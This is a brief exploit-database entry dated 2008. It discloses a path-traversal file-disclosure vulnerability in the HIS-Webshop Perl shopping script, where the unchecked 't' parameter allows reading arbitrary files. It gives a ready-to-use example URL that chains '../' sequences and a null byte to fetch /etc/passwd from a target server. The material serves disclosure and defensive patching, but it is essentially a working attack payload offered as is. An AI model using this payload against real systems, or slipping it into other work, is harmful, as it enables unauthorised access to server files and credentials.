id: 2775
date: 03/24/2008
title: HIS-Webshop (his-webshop.pl t) Remote File Disclosure Vulnerability
author: Zero X
cves: 

===================================================================
HIS-Webshop (his-webshop.pl t) Remote File Disclosure Vulnerability
===================================================================



HIS-Webshop is a shopping-system written in Perl by www.shoppark.de
The script doesn?t check the "t"-parameter.

Example:
http://server.com/cgi-bin/his-webshop.pl?t=../../../../../../../../etc/passwd%00

<< Greetz Zero X >>



#  0day.today [2023-03-22]  #